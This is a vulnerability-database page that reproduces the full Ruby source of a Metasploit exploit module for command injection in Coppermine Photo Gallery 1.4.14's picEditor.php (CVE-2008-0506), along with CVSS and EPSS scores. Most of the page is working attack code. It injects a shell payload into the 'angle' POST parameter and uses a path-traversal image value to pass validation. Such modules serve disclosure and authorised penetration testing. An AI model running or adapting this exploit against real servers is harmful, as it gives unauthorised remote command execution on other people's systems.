Lucene search

K
metasploitJanek Vind, jduck <[email protected]>MSF:EXPLOIT-UNIX-WEBAPP-COPPERMINE_PICEDITOR-
HistoryFeb 19, 2010 - 7:31 a.m.

Coppermine Photo Gallery picEditor.php Command Execution

2010-02-1907:31:12
Janek Vind, jduck <[email protected]>
www.rapid7.com
17

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS

0.963

Percentile

99.6%

This module exploits a vulnerability in the picEditor.php script of Coppermine Photo Gallery versions 1.4.14 and earlier. When configured to use the ImageMagick library, the ‘quality’, ‘angle’, and ‘clipval’ parameters are not properly escaped before being passed to the PHP ‘exec’ command. In order to reach the vulnerable ‘exec’ call, the input must pass several validation steps. The vulnerabilities actually reside in the following functions: image_processor.php: rotate_image(…) include/imageObjectIM.class.php: imageObject::cropImage(…) include/imageObjectIM.class.php: imageObject::rotateImage(…) include/imageObjectIM.class.php: imageObject::resizeImage(…) include/picmgmt.inc.php: resize_image(…) NOTE: Use of the ImageMagick library is a non-default option. However, a user can specify its use at installation time.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Coppermine Photo Gallery picEditor.php Command Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the picEditor.php script of
        Coppermine Photo Gallery versions 1.4.14 and earlier. When configured to
        use the ImageMagick library, the 'quality', 'angle', and 'clipval'
        parameters are not properly escaped before being passed to the PHP
        'exec' command.

        In order to reach the vulnerable 'exec' call, the input must pass
        several validation steps.

        The vulnerabilities actually reside in the following functions:

        image_processor.php: rotate_image(...)
        include/imageObjectIM.class.php: imageObject::cropImage(...)
        include/imageObjectIM.class.php: imageObject::rotateImage(...)
        include/imageObjectIM.class.php: imageObject::resizeImage(...)
        include/picmgmt.inc.php: resize_image(...)

        NOTE: Use of the ImageMagick library is a non-default option. However, a
        user can specify its use at installation time.
      },
      'Author'         =>
        [
          'Janek Vind', # original discovery/exploit
          'jduck'       # metasploit version
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-0506' ],
          [ 'OSVDB', '41676' ],
          [ 'EDB', '5019' ],
          [ 'URL', 'http://forum.coppermine-gallery.net/index.php?topic=50103.0' ]
        ],
      'Privileged'     => true, # web server context
      'Payload'        =>
        {
          'DisableNops' => true,
          'BadChars'    => '\'', # input gets passed to htmlentities
          'Space'       => 1024,
        },
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2008-01-30',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('URI', [ true, "Coppermine directory path", "/cpg1414" ]),
        ])
  end

  def check
    res = send_request_raw({
      'uri' => normalize_uri(datastore['URI'], '/picEditor.php')
    }, 25)

    if (res and res.body =~ /Coppermine Picture Editor/i)
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end


  def exploit

    valid_imgs = %w{thumb_audio.jpg thumb_avi.jpg thumb_doc.jpg thumb_document.jpg thumb_gz.jpg
      thumb_htm.jpg thumb_html.jpg thumb_mid.jpg thumb_midi.jpg thumb_mov.jpg thumb_movie.jpg
      thumb_mp3.jpg thumb_mpeg.jpg thumb_mpg.jpg thumb_nopic.jpg thumb_ogg.jpg thumb_pdf.jpg
      thumb_private.jpg thumb_qtv.jpg thumb_ra.jpg thumb_ram.jpg thumb_rar.jpg thumb_rm.jpg
      thumb_rmj.jpg thumb_swf.jpg thumb_txt.jpg thumb_wav.jpg thumb_wma.jpg thumb_wmv.jpg
      thumb_xls.jpg thumb_zip.jpg}
    img = '../../images/' + valid_imgs[rand(valid_imgs.length)]
    # suppress errors from convert
    angle = rand_text_numeric(1+rand(8)) + ' -quiet 1 2'
    # and exec our cmd :)
    angle += ';' + payload.encoded + ';#'

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'	      => normalize_uri(datastore['URI'], "/picEditor.php"),
      'vars_post' =>
        {
          'angle' => angle,
          'quality' => '50',  # not required, but fixes an error message
          'newimage' => img
        }
      }, 25)

    if (res and res.code == 200)
      print_good("Successfully POST'd exploit data")
    else
      fail_with(Failure::Unknown, "Error POSTing exploit data")
    end

    handler
  end
end

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS

0.963

Percentile

99.6%

Related for MSF:EXPLOIT-UNIX-WEBAPP-COPPERMINE_PICEDITOR-